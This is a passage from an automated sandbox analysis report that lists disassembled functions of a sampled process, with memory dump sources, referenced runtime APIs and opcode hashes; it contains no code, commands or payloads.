                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xtime_diff_to_millis2_xtime_get
                            • String ID:
                            • API String ID: 531285432-0
                            • Opcode ID: 774aedaede76e9a3711c1516632479cb22c6cb9e3aedf9ea3951256c4d324711
                            • Instruction ID: 1403c77275e0a8be2548534b448241a80327373c44c9ab07b652ef69ae495b30
                            • Opcode Fuzzy Hash: 774aedaede76e9a3711c1516632479cb22c6cb9e3aedf9ea3951256c4d324711
                            • Instruction Fuzzy Hash: 1A214F71A111099FDF15EFA4CC82EAEBBB8EF09714F500169F905B7251DB30AD118FA1
                            Function 002C7040 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 236COMMON
                            Download Yara Rule
                            APIs
                            • __Mtx_init_in_situ.LIBCPMT ref: 002C726C
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID: Mtx_init_in_situ
                            • String ID: @.+$`z,
                            • API String ID: 3366076730-3529498242
                            • Opcode ID: d870a0833ec0510d154bf29a10b7b869846393cd5536d3311c4222d3e0859032
                            • Instruction ID: fc3abacc773a25f6305872a724691a8e35edb451bc4cc108cfc5207693b5da41
                            • Opcode Fuzzy Hash: d870a0833ec0510d154bf29a10b7b869846393cd5536d3311c4222d3e0859032
                            • Instruction Fuzzy Hash: 33A127B4E116158FDB21CFA8C984B9EBBF0AF48710F19825EE819AB351D7759D01CF81
                            Function 002EF21F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID: ___free_lconv_mon
                            • String ID: 8"1$`'1
                            • API String ID: 3903695350-1012482134
                            • Opcode ID: 31c416f218f559d66bef1f2220ecfc719514b92820b48d593b52e35162ea9c7b
                            • Instruction ID: 14d503f2d03ad89140ec086074907163d71cfb62f19fe93b995c51e9a2d33634
                            • Opcode Fuzzy Hash: 31c416f218f559d66bef1f2220ecfc719514b92820b48d593b52e35162ea9c7b
                            • Instruction Fuzzy Hash: 6A3192315A03869FEB61AF3ADA05B5673E8AF40310FA0486AE846D7151DF31FCA0CF11
                            Function 002B3930 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                            Download Yara Rule
                            APIs
                            • __Mtx_init_in_situ.LIBCPMT ref: 002B3962
                            • __Mtx_init_in_situ.LIBCPMT ref: 002B39A1
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID: Mtx_init_in_situ
                            • String ID: pB+
                            • API String ID: 3366076730-3309528453
                            • Opcode ID: 98d76686c5f46406dde89820ba646dd13a729ee63973bd0e8c214a7881836247
                            • Instruction ID: 69f83658ffdb1f6a205a77cd913ca8e8894068b578dafff352476150cfad4bdf
                            • Opcode Fuzzy Hash: 98d76686c5f46406dde89820ba646dd13a729ee63973bd0e8c214a7881836247
                            • Instruction Fuzzy Hash: B74125B0501B059FD720CF18C588B9ABBF0FF44355F24861DE86A8B341E7B4AA15CF80
                            Function 002B2520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                            Download Yara Rule
                            APIs
                            • ___std_exception_copy.LIBVCRUNTIME ref: 002B2552
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID: ___std_exception_copy
                            • String ID: P#+$P#+
                            • API String ID: 2659868963-3630811068
                            • Opcode ID: ed869ac024ba471c7f902c38efc6f85bd0ab96595190cac261cad3ffe9d4c1f5
                            • Instruction ID: 6e62ff946a4b019f16bf32d81548c88337a5edcc98b54685f573a603c483f847
                            • Opcode Fuzzy Hash: ed869ac024ba471c7f902c38efc6f85bd0ab96595190cac261cad3ffe9d4c1f5
                            • Instruction Fuzzy Hash: ADF0E270D1120C9BC715DF68D840A8EBBF8AF4A300F1082AEE444A7240EA705A648B94